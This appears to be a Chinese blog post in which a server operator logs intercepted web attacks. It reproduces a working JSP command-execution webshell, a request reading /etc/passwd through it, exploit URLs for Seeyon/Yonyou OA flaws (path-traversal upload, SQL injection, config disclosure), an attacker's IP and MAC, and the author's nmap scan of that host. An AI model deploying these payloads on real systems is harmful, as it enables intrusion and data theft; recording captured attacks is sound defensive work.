网络安全之WebShell截获

不知道这是哪个大哥的手笔有没有认领的20240424十一点四十分左右

大哥计算机的具体信息贴上了，还好大哥没有put成功，返回405！

IP地址
31.49.67.43:36668
MAC地址
80:05:88:48:37:b5
1
2
3
4

1. ToolB的MAC地址厂商信息查询网站：https://toolb.cn/mac-address
2. WaveCN.com的以太网MAC地址查询工具：https://www.wavecn.com/mac.php
3. MAC地址查询网站，提供根据网卡MAC地址查询厂商信息：https://mac.bmcx.com/
4. ITOOL的MAC地址查询在线工具：https://itool.co/mac
5. MiniWebtool的MAC地址查找工具：https://miniwebtool.com/zh-cn/mac-address-lookup/
6. MAC地址查询方法网站：https://mac.chacd.com/
7. Strerr.com的MAC地址查询，网卡OUI制造商查询：https://www.strerr.com/cn/mac-address-lookup.html
8. LZLTool的MAC地址批量查询网站：https://www.lzltool.cn/mac
9. DNSChecker的MAC地址查找工具：https://dnschecker.cloud/cn/mac-lookup.html
10. BCZS的MAC查询，专业免费MAC地址网卡地址蓝牙地址查询：http://mac.bczs.net/

WEB攻击】SERVER-APACHE Apache Tomcat 远程jsp文件上传尝试

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " request.getParameter("cmd") "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp/
1

没上传成功别难受，祝你在其他地放也上传不成功！！

http://xxx.xxx.xxx.xxxx:xxxx/y021.jsp?cmd= cat+/etc/passwd
1

请求头分析

怎么回事，请求头也上代理吗？没必要，反正你也成功不了

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
1
2

这个大哥攻击成功了

http://120.77.82.232:8080/
但是开放了一些端口，就不干你了
1
2

C:\Users\hi>nmap -sV 120.77.82.232
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-24 15:26 中国标准时间
NSOCK ERROR [0.0770s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 120.77.82.232
Host is up (0.040s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT     STATE  SERVICE        VERSION
22/tcp   closed ssh
53/tcp   closed domain
113/tcp  closed ident
1080/tcp closed socks
1688/tcp open   nsjtp-data?
3389/tcp closed ms-wbt-server
5566/tcp closed westec-connect
6000/tcp closed X11
8080/tcp open   http           SimpleHTTPServer 0.6 (Python 3.9.2)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1688-TCP:V=7.93%I=7%D=4/24%Time=6628B473%P=i686-pc-windows-windows%
SF:r(WMSRequest,20,"\x05\0\x03#\x10\0\0\0\x20\0\0\0\x02\0\0\0\x20\0\0\0\0\
SF:0\0\0\x03\0\x01\x1c\0\0\0\0");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.27 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

20240425

别费劲了兄弟，我有安全设备哇，我刚升级完补丁库，你咋想的

文件上传【WEB攻击】致远OA wpsAssistServlet接口任意文件上传漏洞

http://xxx.xxx.xxx.xxx:xxxx/seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/kGlXqM.jsp&fileId=2

http://xxx.xxx.xxx.xxx:xxxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5(999999999)),4

http://xxx.xxx.xxx.xxx:xxxx/yyoa/ext/https/getSessionList.jsp?cmd=getAll

http://xxx.xxx.xxx.xxx:xxxx/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml

http://xxx.xxx.xxx.xxx:xxxx/yyoa/assess/js/initDataAssess.jsp

http://xxx.xxx.xxx.xxx:xxxxseeyon/thirdpartyController.do.css/..;/ajax.do

http://xxx.xxx.xxx.xxx:xxxx/yyoa/ext/trafaxserver/SystemManage/config.jsp
flag=save
realFileType=../../../../ApacheJetspeed/webapps/ROOT/kGlXqM.jsp
fileId=2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16